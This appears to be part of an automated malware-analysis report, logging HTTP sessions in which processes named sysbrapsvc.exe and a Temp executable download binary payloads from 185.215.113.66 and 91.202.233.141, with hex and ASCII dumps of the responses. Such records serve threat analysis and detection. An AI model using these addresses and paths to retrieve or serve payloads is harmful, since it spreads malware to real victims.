                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:52.920958042 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:53.276015043 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:53 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:55.295192003 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:55.650135994 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:55 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.8 | 49750 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:24:13.604774952 CEST | 166 | OUT | GET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:13.944143057 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:13 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 101120
                                                                              Last-Modified: Mon, 06 May 2024 15:20:46 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638f54e-18b00"
                                                                              Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49751 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:24:16.329678059 CEST | 166 | OUT | GET /2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
    Host: 185.215.113.66
May 8, 2024 15:24:16.672487020 CEST | 1289 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 08 May 2024 13:24:16 GMT
    Content-Type: application/octet-stream
    Content-Length: 15104
    Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
    Connection: keep-alive
    ETag: "66299415-3b00"
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49752 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:24:18.626554966 CEST | 167 | OUT | GET /_1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
    Host: 185.215.113.66
May 8, 2024 15:24:18.966797113 CEST | 1289 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 08 May 2024 13:24:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 9224
    Last-Modified: Wed, 08 May 2024 11:35:13 GMT
    Connection: keep-alive
    ETag: "663b6371-2408"
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49753 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:24:19.072272062 CEST | 166 | OUT | GET /3 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
    Host: 185.215.113.66
May 8, 2024 15:24:19.416872025 CEST | 1289 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 08 May 2024 13:24:19 GMT
    Content-Type: application/octet-stream
    Content-Length: 81928
    Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
    Connection: keep-alive
    ETag: "662995f1-14008"
    Accept-Ranges: bytes


                                                                               Session ID: 27 | Source: 192.168.2.8:49754 | Destination: 185.215.113.66:80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:21.341253042 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                               Host: 185.215.113.66
                                                                               May 8, 2024 15:24:21.682579041 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:21 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                               May 8, 2024 15:24:21.682594061 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                               Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                               May 8, 2024 15:24:21.682707071 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                               Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                               May 8, 2024 15:24:21.682720900 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                               Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                               May 8, 2024 15:24:21.682734013 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                               Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                               May 8, 2024 15:24:21.682746887 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                               Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                               May 8, 2024 15:24:21.682799101 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                               Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                               May 8, 2024 15:24:21.682806969 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                               Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                               Session ID: 28 | Source: 192.168.2.8:49755 | Destination: 185.215.113.66:80 | PID: 5588 | Process: C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:21.793037891 CEST | 166 | OUT | GET /4 HTTP/1.1
                                                                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                               Host: 185.215.113.66
                                                                               May 8, 2024 15:24:22.131413937 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:21 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]
                                                                               May 8, 2024 15:24:22.131465912 CEST | 1289 | IN | Data Raw: 93 5f 6b ef 50 05 9e 69 25 3f 3f 17 47 85 2c 6b 90 92 25 c7 a4 33 c7 b4 ac 01 9f 3c 52 af 59 f7 8f 8c b2 8a 34 83 28 21 34 2c 08 b5 72 a3 55 ed 44 21 fc 8e 2b ad 22 49 d4 df 89 7f 22 e5 ce 47 01 f3 e1 b7 6a 95 90 ad a6 27 76 0c 70 18 34 86 d8 a7
                                                                               Data Ascii: _kPi%??G,k%3<RY4(!4,rUD!+"I"Gj'vp494lqQ " [t%/ ,2wUJSxon2F;DI`yMis)p#{x1mWRHFpwYmv.J]%x;U'i%?^`}ihtPA
                                                                               May 8, 2024 15:24:22.131576061 CEST | 1289 | IN | Data Raw: 1c c3 ae 56 be 98 01 6b 9c 1a 7b 08 4e 4a 39 5c 07 87 b3 5b 4f 13 bd 3b 89 f5 de 91 7a 53 87 d5 e3 12 66 87 50 62 62 19 16 47 a1 87 f9 8f 51 ef 1e 4c dd 49 0a 9c c2 51 5f ab bf 5f b4 35 c7 5a 28 84 16 e7 9a 31 36 4e dd 67 f8 5e e6 4a 7b c3 bf 40
                                                                               Data Ascii: Vk{NJ9\[O;zSfPbbGQLIQ__5Z(16Ng^J{@>!HvxGA#J=$SI7l(f^43<P7Xic&mRwaRX_wj15^W:nkv0ExG"F&XI'7K7E"4 gX
                                                                               May 8, 2024 15:24:22.131591082 CEST | 1289 | IN | Data Raw: 4f 94 78 c2 97 9b 63 5e be 60 17 93 29 44 bc d5 ec a9 b6 b4 08 90 51 3b 5d 99 88 3b 5e 0f 58 59 77 af 85 ff 08 65 fb e3 41 d7 e2 f9 54 96 02 47 8a ce 86 0b 91 33 f7 77 7b 52 57 56 74 07 cd bb f0 14 bb 02 b2 59 41 06 90 c8 43 63 75 9f 12 f7 70 b7
                                                                               Data Ascii: Oxc^`)DQ;];^XYweATG3w{RWVtYACcup__BTY,q"KGCQ3c0QC/|xB.Lv?X;Wg;cJrm%3Spc[!%dt y>yw{%dg)(Yr]srX!z
                                                                               May 8, 2024 15:24:22.131652117 CEST | 1289 | IN | Data Raw: bb fc df 8d e3 0f af 38 97 7e 3c 5b 6a cb 09 b4 59 74 22 8d fb a9 0d f1 60 29 df 4e 90 14 35 9a 75 0a 76 65 4c b0 d5 9a 19 e2 87 dc e0 08 6c 3e d0 b6 f5 62 5c c2 fa 20 19 ef 55 b1 e0 ff 82 1b bf b5 10 12 e3 25 c3 9b 9d 61 84 57 33 23 b2 87 f1 d7
                                                                               Data Ascii: 8~<[jYt"`)N5uveLl>b\ U%aW3#|puO"^?,C5cRaCO($yf"[GH7me0_[1Da$q9&{|oj5o6vT(eWnS-kI<ZV#~sX
                                                                               May 8, 2024 15:24:22.131665945 CEST | 1289 | IN | Data Raw: aa 7c 5a 5d 16 d5 71 76 1e 04 c2 b4 d4 90 34 09 eb 56 cd 7d 84 8a 26 c8 b1 15 0d 92 67 ca fe b5 0f b7 5c cc 00 c7 55 08 91 20 53 0e 48 8e e0 75 2e 1a e9 cb 22 b9 eb bc 82 2c 7a 68 56 bd 3a 42 de 02 c6 de 61 ff 10 46 0a 83 2d 97 2a 29 9e 7b 31 05
                                                                               Data Ascii: |Z]qv4V}&g\U SHu.",zhV:BaF-*){1:eU{TjoM{;4gb\rxa"-)*K,K\Id-J\x/AT^)cv_21sc|u7l&{oIt<'2IU;?!E<
                                                                               May 8, 2024 15:24:22.131774902 CEST | 1289 | IN | Data Raw: ff 96 34 ff be 9f d7 1d 17 ae 97 a3 e3 1f 25 28 7f a0 76 42 96 9e 6b b3 fb 60 26 c6 18 ac ad fe b7 7a 33 c2 a5 df e6 1a 43 e0 e2 cb e8 3f 38 1c db 04 16 a1 a1 17 a5 e7 10 cb 46 d6 d5 05 02 4d 80 0d ec d3 b7 fc 89 ae ee 3c cb 96 1f cf ef 7f e1 75
                                                                               Data Ascii: 4%(vBk`&z3C?8FM<ue\`O?)m<[nh7RpUT j%#0JjyAsY@Vy8jmtf"|y#3)JG<*0YnhP,I#]a%>+Y
                                                                               May 8, 2024 15:24:22.131795883 CEST | 1289 | IN | Data Raw: cc c0 d5 f6 76 58 dc 93 86 0a 7a 73 31 1b 86 f2 99 0b 0a c3 29 1f 18 eb 34 62 30 4f 97 68 7a a7 2b e4 dc 7f 15 02 1c 92 a5 dc 04 bc d8 80 89 c1 7d 31 8d cc 5e 00 3e d9 dd 36 a0 29 2a e4 f0 03 d2 9f fb 5e 89 a7 a8 88 0c db 7f 02 b8 4c 9a 20 b8 99
                                                                               Data Ascii: vXzs1)4b0Ohz+}1^>6)*^L hJL3j104-D.0(C"krOB/Wye(m?hH/"'>X,0Yv*Mhl,]=.R~RO.qS5T{U
                                                                               May 8, 2024 15:24:22.131808996 CEST | 1289 | IN | Data Raw: 19 89 96 e9 56 0f 9a 8c 19 b7 05 b4 27 39 21 25 b2 29 35 03 7e f7 f4 ad 75 ff 9f e3 00 20 68 f1 05 5f ae 80 44 41 3a 4f 23 2f d7 4a 79 1a 22 03 77 bd b2 c1 38 a8 21 72 fd 82 f9 23 8d bb de 86 5e 3b f3 ee 08 66 59 00 6d a4 13 79 80 f3 31 29 63 8f
                                                                               Data Ascii: V'9!%)5~u h_DA:O#/Jy"w8!r#^;fYmy1)cWz=9pHjje,]GcDOB)9l)VWdRyl}$C^dC$#nK/tmd}#x,<f7#[e|/")UN+LG.ouX$Js=
                                                                               May 8, 2024 15:24:22.131874084 CEST | 1289 | IN | Data Raw: b0 92 f6 3f 1d 3a a3 f2 72 e7 3c ab 2a 56 d3 0e 3d 84 af 84 17 ae fe f6 bf 04 fa eb a8 21 04 10 46 12 99 06 c0 53 db bb dc 0e e4 b2 22 b6 5c 5d 9c 7b 01 fa 03 3e 6e 9b 77 dc 88 bb 7a fb a2 03 db 1e 8b 86 87 65 f2 56 a1 a8 9b f0 68 45 e3 9b 87 f2
                                                                               Data Ascii: ?:r<*V=!FS"\]{>nwzeVhES#n1KBCiD]p(Eqf$c&WhTos_49KJAZqRW'[LZE/+]RsLgQ_<OvqKKmL}:pfj^qh fW]
                                                                               May 8, 2024 15:24:22.471158028 CEST | 1289 | IN | Data Raw: ae 13 d9 3c 80 95 1b 13 9e 3f c9 4c 70 f0 19 fc 72 a9 9d 72 9d 76 2d af 9d 78 f3 f8 ea f0 1a 30 30 f2 bc d5 d3 68 75 96 42 e1 16 bf 93 0f ed bd b7 9c 3a 47 ce 12 12 56 20 bf 54 2c 55 54 a9 64 4b e6 87 6a 07 a1 d0 67 f7 7d 50 da fd f5 9c 78 6d fc
                                                                               Data Ascii: <?Lprrv-x00huB:GV T,UTdKjg}PxmZyo!DaH,1$DSP<*J2m-Fhr&:O(d?QhBQ<Mh_)p"b,~b[KWZ5f:Gz}j[6,gXiR6


                                                                               Session ID: 29 | Source: 192.168.2.8:49756 | Destination: 185.215.113.66:80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
